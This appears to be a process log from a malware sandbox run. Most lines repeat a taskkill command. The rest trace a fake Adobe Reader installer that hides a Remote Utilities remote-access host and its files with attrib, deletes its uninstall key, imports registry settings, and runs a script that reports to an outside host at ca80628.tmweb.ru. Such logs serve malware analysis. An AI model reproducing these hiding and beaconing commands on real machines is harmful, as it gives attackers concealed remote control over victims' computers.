taskkill.exe (PID: 2060 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 636 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 768 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3312 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3372 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1580 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1504 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3216 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3540 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3536 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3672 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1920 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3768 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3668 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1672 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3816 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 436 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3136 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3844 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2804 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3888 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3936 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2932 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1876 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 256 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2464 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2264 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3568 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 4060 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2524 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2140 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 480 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3252 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2064 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2492 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2420 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3704 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1060 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2776 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2056 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2532 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2584 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2152 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2348 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2792 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2112 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2884 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2472 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3080 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3124 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 776 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3352 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3440 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3148 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3420 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3332 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1568 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3396 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3544 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3508 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3584 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3248 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3460 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3672 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1920 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3464 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3324 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2608 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2516 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3964 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3480 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3116 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3892 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3912 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1896 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3860 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1512 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3120 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2116 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2620 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3568 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1612 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3936 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2436 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 292 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2412 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3884 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3452 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2332 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2420 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2388 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1228 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2136 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2056 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2416 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2248 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2956 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3740 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2408 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2908 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2896 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3800 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2336 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2040 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1576 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1536 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3280 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3268 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1164 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3304 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3312 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1888 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3436 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3216 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 644 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3256 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3760 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3404 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3768 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3836 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3508 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2516 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3108 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3864 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2284 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3896 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3484 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 188 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1908 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 244 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 256 cmdline: taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}' MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

cmd.exe (PID: 2920 cmdline: C:\Windows\system32\cmd.exe /c ''C:\inst_fold\armsettings.bat' ' MD5: AD7B9C14083B52BC532FBA5948342B98)

attrib.exe (PID: 2952 cmdline: attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\*.*' MD5: 459A5755AFBB1CB3E67CA4C1296599E3)

attrib.exe (PID: 2572 cmdline: attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host' MD5: 459A5755AFBB1CB3E67CA4C1296599E3)

attrib.exe (PID: 2088 cmdline: attrib +s +h 'C:\Program Files\Remote Utilities - Host\*.*' MD5: 459A5755AFBB1CB3E67CA4C1296599E3)

attrib.exe (PID: 3148 cmdline: attrib +s +h 'C:\Program Files\Remote Utilities - Host' MD5: 459A5755AFBB1CB3E67CA4C1296599E3)

attrib.exe (PID: 612 cmdline: attrib +s +h 'C:\inst_fold' MD5: 459A5755AFBB1CB3E67CA4C1296599E3)

attrib.exe (PID: 3328 cmdline: attrib +s +h 'C:\inst_fold\armstatus.exe' MD5: 459A5755AFBB1CB3E67CA4C1296599E3)

attrib.exe (PID: 768 cmdline: attrib +s +h 'C:\inst_fold\armstart.exe' MD5: 459A5755AFBB1CB3E67CA4C1296599E3)

reg.exe (PID: 1888 cmdline: reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E945283B-758C-4A40-B851-1066D0E49EA8} /f MD5: D69A9ABBB0D795F21995C2F48C1EB560)

timeout.exe (PID: 3444 cmdline: timeout 3 MD5: 419A5EF8D76693048E4D6F79A5C875AE)

regedit.exe (PID: 3848 cmdline: regedit /s 'C:\inst_fold\armfix.reg' MD5: 8A4883F5E7AC37444F23279239553878)

reg.exe (PID: 268 cmdline: reg import 'C:\inst_fold\armfix.reg' /reg:64 MD5: D69A9ABBB0D795F21995C2F48C1EB560)

timeout.exe (PID: 3820 cmdline: timeout 3 MD5: 419A5EF8D76693048E4D6F79A5C875AE)

armforce.exe (PID: 3988 cmdline: 'C:\inst_fold\armforce.exe' C:\inst_fold\armstatus.bat MD5: 9245B8EC3D40D640E5CF5183F49CE2F6)

cmd.exe (PID: 3392 cmdline: 'C:\Windows\System32\cmd.exe' /c 'C:\inst_fold\armstatus.bat' MD5: AD7B9C14083B52BC532FBA5948342B98)

tasklist.exe (PID: 2200 cmdline: unknown MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

explorer.exe (PID: 4092 cmdline: C:\Windows\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

armstatus.exe (PID: 2256 cmdline: 'C:\inst_fold\armstatus.exe' 1 C:\inst_fold\armdaemon.js MD5: 536B8E509B970FFEBF115C66D6AF7E3C)

cmd.exe (PID: 2160 cmdline: 'C:\Windows\System32\cmd.exe' /c 'cscript /nologo C:\inst_fold\armdaemon.js 'http://ca80628.tmweb.ru/f.php?data=000-000-000-000&id_k=1'' MD5: AD7B9C14083B52BC532FBA5948342B98)

cscript.exe (PID: 2364 cmdline: cscript /nologo C:\inst_fold\armdaemon.js 'http://ca80628.tmweb.ru/f.php?data=000-000-000-000&id_k=1' MD5: A3A35EE79C64A640152B3113E6E254E2)

msiexec.exe (PID: 2152 cmdline: C:\Windows\system32\MsiExec.exe -Embedding 811B175E7191221789A53427DBAD15F3 MD5: 4315D6ECAE85024A0567DF2CB253B7B0)

taskeng.exe (PID: 2644 cmdline: taskeng.exe {0EBC3A93-A818-47F5-837A-5A0A478FB651} S-1-5-21-290172400-2828352916-2832973385-1001:computer\user:Interactive:[1] MD5: 4F2659160AFCCA990305816946F69407)

CDaNsQ7Rrd.exe (PID: 2404 cmdline: 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' AI_RESUME=1 ADDLOCAL=MainFeature,RequiredApplication PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\' MD5: EDA8E4F2DF81E0BA5B88D73DE9779205)

